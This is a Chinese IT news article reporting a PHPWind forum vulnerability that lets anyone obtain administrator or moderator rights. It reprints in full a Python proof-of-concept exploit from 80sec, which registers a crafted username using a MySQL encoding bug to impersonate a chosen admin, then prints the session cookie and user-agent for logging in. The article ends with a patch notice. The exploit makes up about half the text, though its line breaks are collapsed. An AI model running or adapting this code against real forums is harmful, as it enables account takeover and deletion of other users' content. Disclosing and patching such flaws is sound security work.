作者:左邊
【賽迪網-IT技術報道】據悉:近日,國內知名的社區軟件PHPWIND所有版本又現嚴重漏洞。黑客利用該漏洞可導致任何人可以取得前台管理員及斑主權限,做刪除帖子等任意操作。目前PHPWIND已經向用戶緊急發出最新安全補丁,廣大站長及時下載與更新補丁包,並通知身邊的站長。
詳情:
漏洞發布:http://www.80sec.com/
漏洞作者:[email protected]
漏洞廠商: http://www.phpwind.com/
PHPWind論壇系統是一套采用php+mysql數據庫方式運行並可生成HTML頁面的全新且完善的強大系統。因具有非凡的訪問速度和卓越的負載能力而深受國內外朋友的喜愛。
本漏洞影響phpwind所有版本
漏洞危害:高
漏洞說明:phpwind是國內使用非常廣泛的一款程序,由於在程序設計上存在錯誤,導致任何人可以取得前台管理員及斑主權限,做刪除帖子等任意操作。
漏洞分析:由於phpwind論壇在設計上對數據庫存儲機制不了解,導致在程序邏輯上判斷有問題,用精心構造的數據注冊用戶即可獲得管理權限。
漏洞測試:
[code]# -*- coding: gb2312 -*-import urllib2,httplib,syshttplib.HTTPConnection.debuglevel = 1cookIEs = urllib2.HTTPCookieProcessor()opener = urllib2.build_opener(cookies)def banner(): print "" print "########################################################" print "Phpwind所有版本管理權限洩露漏洞利用poc" print "Copyright (C) 2006" print "[email protected]" print "80sec是一個新的致力於web安全的小團體" print "http://www.80sec.com"def usage(): banner() print "Usage:/n" print " $ ./phpwind.py pwforumurl usertoattack/n" print " pwforumurl 目標論壇地址如http://www.80sec.com/" print " usertoattack 目標擁有權限的斑竹或管理員" print " 攻擊結果將會在目標論壇注冊一個和目標用戶一樣的帳戶" print " 最新版本可以使用uid登陸" print " 其他版本可以使用cookie+useragent登陸" print "########################################################" print ""argvs=sys.argvusage()data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec&[email protected]®emailtoall=1&step=2" %(argvs[2],"%c1")pwurl = "%s/register.php" % argvs[1]request = urllib2.Request(url = pwurl , headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'}, data = data)f=opener.open(request)headers=f.headers.dictcookie=headers["set-cookie"]try:if cookie.index('winduser'):print "Exploit Success!"print "Login with uid passWord @80sec or Cookie:"print cookieprint "User-agent: 80sec owned this"except:print "Error! http://www.80sec.com"print "Connect root#80sec.com"[/code]
PHPWind Forums 20080601 補丁發布(最後更新:20080601)(點擊下載)
適用范圍:數據庫使用 mysql 4.1 以上版本
問題描述:由MySQL一個編碼Bug產生的安全隱患,威脅到網站的安全運行。
(責任編輯:董建偉)